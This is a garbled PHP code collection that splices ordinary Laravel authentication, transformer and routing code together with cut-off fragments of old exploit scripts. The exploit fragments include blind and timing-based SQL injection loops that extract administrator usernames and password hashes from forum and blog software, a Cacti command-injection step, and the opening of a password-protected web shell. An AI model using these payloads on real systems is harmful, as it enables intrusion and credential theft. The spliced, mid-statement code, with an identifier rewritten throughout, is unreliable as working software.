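/**
 * Authenticate a user by username and password.
 *
 * Looks the account up through Person::getUsername(), verifies the password
 * with \Hash::check() and, for records still carrying a legacy md5 digest,
 * transparently re-hashes the password with bcrypt() on a successful login.
 * On success the transformed user record is stored in the session under
 * 'user' and the decoded person id is returned.
 *
 * @param string $username
 * @param string $password plain-text password supplied by the caller
 *
 * @return mixed decoded person id (my_decode() result) on success, false otherwise
 */
public function verify($username, $password)
{
    $person = new Person();
    $resp = $person->getUsername($username);

    // Unknown user: nothing to compare against.
    if (empty($resp)) {
        return false;
    }

    if (\Hash::check($password, $resp['password'])) {
        $auth = true;
    } elseif (hash_equals((string) $resp['password'], md5((string) $password))) {
        // Legacy md5 record. Use a strict, constant-time comparison instead of
        // `==`, which would treat two "0e..." digests as numerically equal.
        // Upgrade the stored digest to bcrypt now that the plaintext is known.
        $resp['password'] = bcrypt($password);
        $id = my_encode($resp['id']);
        $person->update($id, $resp);
        $auth = true;
    } else {
        $auth = false;
    }

    if (!$auth) {
        return false;
    }

    $result = $person->respondWithItem($resp, new UserTransformer());
    session()->put('user', $result);

    return my_decode($resp['id']);
}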
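/**
 * Flatten a nested site-map array into a list of URIs.
 *
 * String leaves become "<path><my_encode(leaf)>.html"; array nodes become a
 * "<path><my_encode(key)>/" directory entry followed (recursively) by the
 * URIs of their children.
 *
 * @param array  $tempSiteMap nested map: key => string leaf | array subtree
 * @param string $path        URI prefix to prepend (expected to end with '/')
 *
 * @return string[] flat list of URIs in depth-first order
 *
 * @throws \UnexpectedValueException when a node is neither a string nor an array
 */
function createUriList($tempSiteMap, $path)
{
    $uriList = [];
    foreach ($tempSiteMap as $parent => $child) {
        if (is_string($child)) {
            $uriList[] = $path . my_encode($child) . '.html';
            continue;
        }
        if (is_array($child)) {
            $newPath = $path . my_encode($parent) . '/';
            // Depth-first: the directory entry precedes its children.
            $uriList[] = $newPath;
            $uriList = array_merge($uriList, createUriList($child, $newPath));
            continue;
        }
        // Previously `echo ... die`, which killed the request and printed the
        // server-side file path into the output; raise instead so callers can
        // handle the error and no path information leaks to the client.
        throw new \UnexpectedValueException(sprintf(
            'Bad JSON node at key "%s": expected string or array, got %s',
            (string) $parent,
            gettype($child)
        ));
    }

    return $uriList;
}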
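/**
 * List persons with their per-person report counts (paged).
 *
 * Rejects callers whose OauthCustomSession role is 'U', or whose token does
 * not resolve to a session at all. Reads the optional `limit` (default 5)
 * and `skip` (default 0) query parameters, loads one page through
 * $this->person->all() and, for every row, counts that person's reports by
 * report_type (0 => totalIReport, anything else => totalGReport) through
 * $this->report->getReportsByPerson().
 *
 * @param Request $request
 *
 * @return \Illuminate\Http\Response JSON ['data' => [...]] or ['error' => string]
 */
public function index(Request $request)
{
    $params = $request->all();

    // find() yields null for an unknown token; dereferencing ->role on null
    // was a fatal error, so treat "no session" exactly like "not authorized".
    $session = OauthCustomSession::find(get_token($request));
    if ($session === null || $session->role == 'U') {
        // Explicit 403 instead of an implicit 200, so clients cannot mistake
        // the refusal for a successful (empty) listing.
        return response(['error' => 'User not authorize to this resource.'], 403);
    }

    // Paging values arrive as query-string strings; coerce them to
    // non-negative integers instead of forwarding raw input to the data layer.
    $data = [
        'items' => [],
        'totalRecords' => 0,
        'limit' => max(0, (int) ($params['limit'] ?? 5)),
        'skip' => max(0, (int) ($params['skip'] ?? 0)),
    ];

    $response = $this->person->all(['limit' => $data['limit'], 'skip' => $data['skip']]);
    if (isset($response['error'])) {
        return response(['error' => $response['error']]);
    }

    $data['totalRecords'] = $response['totalRecords'];
    foreach ($response['data'] as $row) {
        // Tally this person's reports by type before the id is obfuscated.
        $reports = $this->report->getReportsByPerson($row['id']);
        $row['id'] = my_encode($row['id']);
        $row['totalIReport'] = 0;
        $row['totalGReport'] = 0;
        foreach ($reports['data'] ?? [] as $srow) {
            if ($srow['report_type'] == 0) {
                $row['totalIReport']++;
            } else {
                $row['totalGReport']++;
            }
        }
        $data['items'][] = $row;
    }

    return response(['data' => $data]);
}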
/**
 * Turn this item object into a generic array.
 *
 * Ids (id, person_id, item_id) are obfuscated through my_encode(); every
 * optional field falls back to an empty string when absent or null.
 *
 * @param array $item
 *
 * @return array
 */
public function transform($item)
{
    return [
        'id' => my_encode($item['id']),
        'comment' => $item['comment'] ?? '',
        'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '',
        'item_id' => isset($item['item_id']) ? my_encode($item['item_id']) : '',
        'created' => $item['created'] ?? '',
        'updated' => $item['updated'] ?? '',
    ];
}
/**
 * Turn this item object into a generic array.
 *
 * `id` and `person_id` are obfuscated through my_encode(); `name` is
 * required, every other field falls back to '' when absent or null.
 *
 * @param array $item
 *
 * @return array
 */
public function transform($item)
{
    return [
        'id' => my_encode($item['id']),
        'name' => $item['name'],
        'description' => $item['description'] ?? '',
        'created' => $item['created'] ?? '',
        'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '',
        'author' => $item['author'] ?? '',
        'is_archive' => $item['is_archive'] ?? '',
        'report_type' => $item['report_type'] ?? '',
    ];
}
) ) $polling_items[arg1] is passed to a popen() call in /include/poller.php, see exec_poll() function... you do not have any output but you can redirect it to some file in /rra or /log folder which is 'cactiuser'' */ $command = my_encode($cmd . " > ./rra/suntzu.log"); $h = my_encode("127.0.0.1"); $pr = my_encode("proc"); $sql = "1111)/**/UNION/**/SELECT/**/2,0,1,1,{$h},null,1,null,null,161,500,{$pr},null,1,300,0,{$command},null,null/**/FROM/**/host/*"; $packet = "GET " . $p . "cmd.php?1+{$sql}+11111 HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); sleep(2); $packet = "GET " . $p . "rra/suntzu.log HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); echo $html; $command = my_encode("rm ./rra/suntzu.log"); $sql = "1111)/**/UNION/**/SELECT/**/2,0,1,1,{$h},null,1,null,null,161,500,{$pr},null,1,300,0,{$command},null,null/**/FROM/**/host/*"; $packet = "GET " . $p . "cmd.php?1+{$sql}+11111 HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); ?> # milw0rm.com [2006-12-27]
break; } } if ($i == 255) { die("\nExploit failed..."); } } $j++; } echo "\n"; $j = 1; $admin = ""; echo "admin user -> "; while (!strstr($admin, chr(0))) { for ($i = 0; $i <= 255; $i++) { $sql = "9999999)/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),1,0))/**/FROM/**/bb1_users/**/LIMIT/**/1)/**/AND/**/subject=" . my_encode("sun-tzu") . "/*"; $sql = urlencode($sql); $data = "action=delmark"; $data .= "&pmid[0]={$sql}"; $data .= "&folderid=outbox"; $packet = "POST " . $p . "pms.php HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Cookie: " . $cookie . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); sleep(1); if (!check_pm()) { $admin .= chr($i);
echo "password -> " . $password . "[???]\r\n"; sleep(2); break; } } if ($i == 255) { die("Exploit failed..."); } } $j++; } $admin = ""; $j = 1; while (!strstr($admin, chr(0))) { for ($i = 0; $i <= 255; $i++) { $sql = $prefix . "users/**/WHERE/**/user_group=" . my_encode("Administrator") . "/**/AND/**/(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),benchmark(900000,sha1(" . my_encode("suntzu") . ")),-1))/*"; echo "sql -> " . $sql . "\r\n"; $sql = urlencode($sql); $data = "old_prefix=" . $sql; $data .= "&member_accounts=0"; $data .= "&rooms=0"; $data .= "&settings=1"; $data .= "&connvert=0"; $packet = "POST " . $p . "upgradev1.php?step=3 HTTP/1.0\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; usleep(2000000); $starttime = time();
<?php error_reporting(0); session_start(); unset($user); // Just in case ;-] unset($pass); if ($_POST['cmd']) { $_POST['cmd'] = my_encode($_POST['cmd']); } $cache_lines = 1000; $history_lines = 100; $history_chars = 20; $user[] = "root"; $pass[] = md5("fuckyou"); $user[] = "user"; $pass[] = md5("fuckhacker"); $alias = array("la" => "ls -la", "rf" => "rm -f", "unbz2" => "tar -xjpf", "ungz" => "tar -xzpf"); if (!$_SESSION['user']) { $pr_login = "******"; $pr_pass = "******"; $err = "Invalid login!\n\n"; $succ = "Warning! \nDon`t be stupid .. this is a priv3 server, so take extra care!!!\n\n"; if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD $_SESSION['output'] .= $pr_pass; if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS $key = array_search($_SESSION['login'], $user); if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD
/**
 * Turn this item object into a generic array.
 *
 * `id`, `report_id` and `person_id` are obfuscated through my_encode();
 * optional fields fall back to '' when absent or null.
 *
 * NOTE(review): `person_name` is also passed through my_encode(), unlike the
 * sibling transformers where only ids are encoded — this looks like a
 * copy/paste from `person_id`; confirm with the API consumers before changing.
 *
 * @param array $item
 *
 * @return array
 */
public function transform($item)
{
    return [
        'id' => my_encode($item['id']),
        'report_id' => isset($item['report_id']) ? my_encode($item['report_id']) : '',
        'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '',
        'person_name' => isset($item['person_name']) ? my_encode($item['person_name']) : '',
        'created' => $item['created'] ?? '',
        'updated' => $item['updated'] ?? '',
    ];
}
} $j++; } $packet = "GET " . $path . "u2u.php?action=emptytrash HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "u2u.php\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Cookie: " . $cookie . "\r\n\r\n"; sendpacketii($packet); $unused = array('<', '>', '|', '"', '[', ']', '\\', ',', '@', '\'', ' '); $j = 1; $admin = ""; while (!strstr($admin, chr(0))) { for ($i = 0; $i <= 255; $i++) { if (!in_array(chr($i), $unused)) { $sql = "999999'/**/or/**/(1=(SELECT(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),1,0))/**/FROM/**/" . $prefix . "members/**/WHERE/**/status=" . my_encode("Super Administrator") . ") AND owner=" . my_encode($user) . ")/*"; echo "sql -> " . $sql . "\r\n"; $sql = urlencode($sql); $data = "u2uid=" . $sql; $data .= "&msgto=" . $user; //send to yourself $data .= "&subject=hello"; $data .= "&message=hellohellohello"; $data .= "&del=yes"; $data .= "&sendsubmit=1"; $packet = "POST " . $path . "u2u.php?action=send HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "u2u.php\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Cookie: " . $cookie . "\r\n";
/* |-------------------------------------------------------------------------- | Routes File |-------------------------------------------------------------------------- | | Here is where you will register all of the routes in an application. | It's a breeze. Simply tell Laravel the URIs it should respond to | and give it the controller to call when that URI is requested. | */ Route::get('/test', function () { // $this->cc = new \CouchbaseCluster(env('CB_HOST', 'couchbase://localhost'), 'admin', 'password'); // $this->cb = $this->cc->openBucket(env('CB_BUCKET', '5sportal')); // pr($this->cb->get('person_2')); pr(my_encode(112)); }); Route::get('/', function () { return view('welcome'); }); /* |-------------------------------------------------------------------------- | Application Routes |-------------------------------------------------------------------------- | | This route group applies the "web" middleware group to every route | it contains. The "web" middleware group is defined in your HTTP | kernel and includes session state, CSRF protection, and more. | */ Route::group(['middleware' => ['web']], function () {
} else { if ($_POST["action"] != "login") { echo deal_temp("temp/{$tempname}/login.htm", array("title" => $title)); die; } $user_orig = $_POST["user_name"]; $pass_orig = $_POST["user_pass"]; $user_name = my_encode($user_orig); $user_pass = my_encode($pass_orig); $users = file("class/users.php"); for ($i = 1; $i < count($users); $i++) { if (!trim($users[$i])) { continue; } $arr = explode("|", $users[$i]); if ($user_name == my_encode($arr[0]) && $user_pass == $arr[1]) { mkcookie('user_name', $user_name); mkcookie('user_pass', $user_pass); mkcookie('last_time', date("D, d M Y H:i:s") . " GMT"); inlog("登陆成功,用户名:" . $user_orig); if ($user_orig == "admin" && $pass_orig == "admin") { exit("<script language=javascript>alert(\"欢迎使用 PHPCMS 文件管理器 \\n您是第一次登陆本程序\\n现在请修改默认密码!\");window.location = 'admin.php?action=muser&name=admin';</script>"); } else { ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta http-equiv="refresh" content="1;url=index.php"> <title><?php echo $title; ?>
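/**
 * Resolve the logged-in user's rights from the user_name / user_pass cookies.
 *
 * Reads class/users.php (records of the form `name|hash|root|group|`, first
 * line skipped) and class/group.php (records of the form `group|right|...`,
 * first line skipped). When a record matches both cookies, returns a map with
 * every known action key preset to false, plus 'root', 'name', 'group', each
 * granted right set to 1 and, for an `&a&b` style entry, 'limittype' and
 * 'limit'. Returns null when no record matches.
 *
 * @return array|null
 */
function check_login()
{
    $user = (string) getcookie("user_name");
    $pass = (string) getcookie("user_pass");

    // An absent cookie must never authenticate: the previous loose `==` let an
    // empty value compare equal to an empty or missing stored field.
    if ($user === '' || $pass === '') {
        return null;
    }

    $actions = "newdir|newfile|downfile|zippack|unpack|upfile|copy|move|savefromurl|delete|viewsorce|rename|savefile|select|property|admin|search|";
    $dd = [];
    foreach (explode("|", $actions) as $action) {
        $dd[$action] = false;
    }

    // Missing or unreadable files are treated as empty instead of @-suppressed.
    $users = is_readable("class/users.php") ? (file("class/users.php") ?: []) : [];
    $groups = is_readable("class/group.php") ? (file("class/group.php") ?: []) : [];

    // group name => "|right|right|..." (the remainder of the record).
    $group = [];
    for ($i = 1, $n = count($groups); $i < $n; $i++) {
        $line = trim($groups[$i]);
        // `!strpos` also rejects a record that starts with '|' (empty group name).
        if ($line === '' || !strpos($line, "|")) {
            continue;
        }
        $fields = explode("|", $line);
        // Strip only the leading name; str_replace() would also have removed
        // every later occurrence of the name inside the rights themselves.
        $group[$fields[0]] = substr($line, strlen($fields[0]));
    }

    for ($i = 1, $n = count($users); $i < $n; $i++) {
        $fields = explode("|", $users[$i]);
        if (count($fields) < 4) {
            continue; // malformed record: name, hash, root and group are required
        }
        // Strict, constant-time comparison of both credentials (no `==` juggling).
        if (!hash_equals((string) my_encode($fields[0]), $user)
            || !hash_equals((string) $fields[1], $pass)) {
            continue;
        }

        $dd["root"] = $fields[2];
        $dd["name"] = $fields[0];
        $dd["group"] = $fields[3];

        $rights = isset($group[$fields[3]]) ? $group[$fields[3]] : '';
        foreach (explode("|", $rights) as $right) {
            if ($right === '' || $right === '0') {
                continue;
            }
            // An '&' beyond position 0 marks a limit list (`&a&b`), not a right.
            if (strrpos($right, "&")) {
                if (substr($right, 0, 1) === "&") {
                    $right = substr($right, 1);
                }
                $dd["limittype"] = str_replace("&", ",", $right);
                $dd["limit"] = [];
                foreach (explode('&', $right) as $limit) {
                    if ($limit === '' || $limit === '0') {
                        continue;
                    }
                    $dd["limit"][$limit] = 1;
                }
            } else {
                $dd[$right] = 1;
            }
        }

        return $dd;
    }

    return null;
}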
/**
 * Turn this item object into a generic array.
 *
 * `id` is obfuscated through my_encode() and `username` is required. The
 * string fields fall back to '' when absent or null; the two report counters
 * fall back to 0.
 *
 * @param array $item
 *
 * @return array
 */
public function transform($item)
{
    $stringFields = [
        'first_name', 'last_name', 'gender', 'email', 'userimage', 'city',
        'state', 'country', 'occupation', 'role', 'created', 'updated',
    ];

    $out = [
        'id' => my_encode($item['id']),
        'username' => $item['username'],
    ];
    foreach ($stringFields as $field) {
        $out[$field] = $item[$field] ?? '';
    }
    $out['totalIReport'] = $item['totalIReport'] ?? 0;
    $out['totalGReport'] = $item['totalGReport'] ?? 0;

    return $out;
}
} makeup("class/users.php"); exit4("用户 {$username} 添加成功!", @fclose($fp)); } else { $users = @file("class/users.php"); $content = ""; foreach ($users as $v) { if (!$v) { continue; } $arr = explode("|", $v); if ($arr[0] == $username) { if ($arr[1] != my_encode($_POST["origpass"]) && $user["group"] != "administrators") { exit4("由于您不在administrators组\\n只有输入正确的密码才能继续操作!", 0); } $password = $password ? my_encode($password) : $arr[1]; $content .= "{$username}|{$password}|{$root}|{$group}|\n"; } else { $content .= "{$v}\n"; } } $action = "user"; if (!is_dir($root)) { if (@mkdir($root)) { exit4("{$root} 创建失败!", 0); } } if (@file_put_contents("class/users.php", $content)) { makeup("class/users.php"); exit4("用户 {$username} 更新成功!"); } else {
//debug echo $html . "\r\n"; die("Exploit failed...maybe wrong table prefix"); } } $j++; } $admin = str_replace(chr(0), "", $admin); echo "admin -> " . $admin . "\r\n"; $password = ""; $j = 1; while (!strstr($password, chr(0))) { for ($i = 0; $i <= 255; $i++) { $starttime = time(); echo "starttime -> " . $starttime . "\r\n"; $sql = "99999 UNION SELECT IF((ASCII(SUBSTRING(password," . $j . ",1))=" . $i . ") & 1, benchmark(50000000,CHAR(0)),0) FROM " . $prefix . "users WHERE username="******" ", "/**/", $sql); $sql = urlencode($sql); $packet = "GET " . $p . "index.php?shard=blog&action=proc_reply HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Cookie: ID=" . $sql . ";\r\n"; $packet .= "Connection: Close\r\n\r\n"; echo quick_dump($packet) . "\r\n"; sendpacketii($packet); $endtime = time(); echo "endtime -> " . $endtime . "\r\n"; $difftime = $endtime - $starttime; echo "difftime -> " . $difftime . "\r\n"; if ($difftime > 5) { $password .= chr($i); echo "password -> " . $password . "[???]\r\n";
if ($add_admin) { echo "admin user added with username 'suntzu' and password 'suntzu'..."; } } else { echo "exploit failed..."; } } elseif ($action == 2) { function is_hash($hash) { if (ereg("([a-f0-9]{32})", trim($hash))) { return true; } else { return false; } } $SQL = "9999999/**/UNION/**/SELECT/**/null,userpassword,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/FROM/**/" . $prefix . "user/**/WHERE/**/username="******"/*"; $data = "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"board[styleid]\";\r\n\r\n"; $data .= "{$SQL}\r\n"; $data .= "-----------------------------7d61bcd1f033e--\r\n"; $packet = "POST " . $p . "index.php HTTP/1.0\r\n"; $packet .= "SUNTZU: " . $argu . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; sendpacketii($packet); if (eregi("<pre><b>ThWboard Error</b><br>", $html)) { echo $html; die("\n\nquery error... see html");
/**
 * Turn this item object into a generic array.
 *
 * `id`, `item_id` and `person_id` are obfuscated through my_encode();
 * optional fields fall back to '' when absent or null.
 *
 * @param array $item
 *
 * @return array
 */
public function transform($item)
{
    return [
        'id' => my_encode($item['id']),
        'media' => $item['media'] ?? '',
        'location' => $item['location'] ?? '',
        'item_id' => isset($item['item_id']) ? my_encode($item['item_id']) : '',
        'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '',
        'created' => $item['created'] ?? '',
        'updated' => $item['updated'] ?? '',
    ];
}
/**
 * Turn this item object into a generic array.
 *
 * `id`, `person_id` and `report_id` are obfuscated through my_encode();
 * optional fields fall back to '' when absent or null.
 *
 * @param array $item
 *
 * @return array
 */
public function transform($item)
{
    return [
        'id' => my_encode($item['id']),
        'title' => $item['title'] ?? '',
        'comment' => $item['comment'] ?? '',
        'description' => $item['description'] ?? '',
        'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '',
        'report_id' => isset($item['report_id']) ? my_encode($item['report_id']) : '',
        'is_archive' => $item['is_archive'] ?? '',
        'created' => $item['created'] ?? '',
        'updated' => $item['updated'] ?? '',
    ];
}
calling directly the /code/guestadd.php script we have sql injections in multiple arguments, "newmessage", "newname","newwebsite","newemail" and we can use quotes because we have: [argument] = str_replace("\'","'",[argument]); on every ones oh, let me see our query... INSERT INTO phpusql_guestbook VALUES('1', '[injection here] so... */ $UTAG = my_encode("<USER>"); $PTAG = my_encode("<PASS>"); $SQL = "1',(SELECT/**/CONCAT(" . $UTAG . ",username," . $UTAG . ")/**/FROM/**/" . $prefix . "users/**/WHERE/**/ADMIN=1),"; $SQL .= "(SELECT/**/CONCAT(" . $PTAG . ",password," . $PTAG . ")/**/FROM/**/" . $prefix . "users/**/WHERE ADMIN=1),'1','1.1.1.1','1')"; $SQL .= "/**/ON/**/DUPLICATE /**/KEY/**/UPDATE/**/autono=autono+1/*"; //funny, isn't it? :) we hide password hashes inside guestbook html //also, I note this, we have a spoofing issue, beacuse of extract() //let's overwrite the ip address... $data = '-----------------------------7d61bcd1f033e Content-Disposition: form-data; name="_SERVER[REMOTE_ADDR]"; 1.1.1.1 -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="newmessage"; 1 -----------------------------7d61bcd1f033e
} } return $encoded; } $j = 1; $my_uid = ""; echo "\nyour user id -> "; while (!strstr($my_uid, chr(0))) { for ($i = 0; $i <= 255; $i++) { if (in_array($i, $chars)) { $data = "s="; $data .= "&do=docopyposts"; $data .= "&destforumid={$forumid}"; $data .= "&title=suntzu"; $data .= "&forumid={$forumid}"; $data .= "&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid," . $j . ",1))=" . $i . "),{$existing_post},-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username="******"/**/LIMIT/**/1/*"; $packet = "POST " . $p . "inlinemod.php?f={$forumid} HTTP/1.0\r\n"; $packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet .= "Referer: http://" . $host . $path . "profile.php\r\n"; $packet .= "Accept-Language: it\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Pragma: no-cache\r\n"; $packet .= "Cookie: " . $cookie . "; \r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); if (eregi("You have an error in your SQL syntax", $html)) { echo $html;
break; } } if ($i == 255) { die("\nExploit failed..."); } } $j++; } echo "\n"; echo "admin user -> "; $j = 1; $admin = ""; while (!strstr($admin, chr(0))) { for ($i = 0; $i <= 255; $i++) { $sql = "999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login," . $j . ",1))=" . $i . ")," . my_encode("open") . "," . my_encode("sun-tzu") . "))/**/FROM/**/" . $prefix . "users/**/WHERE/**/ID=1/*"; $data = "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"title\";\r\n\r\n"; $data .= "1\r\n"; $data .= "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"url\";\r\n\r\n"; $data .= "1\r\n"; $data .= "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n"; $data .= "1\r\n"; $data .= "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n"; $data .= "{$sql}\r\n"; $data .= "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n"; $data .= "1\r\n";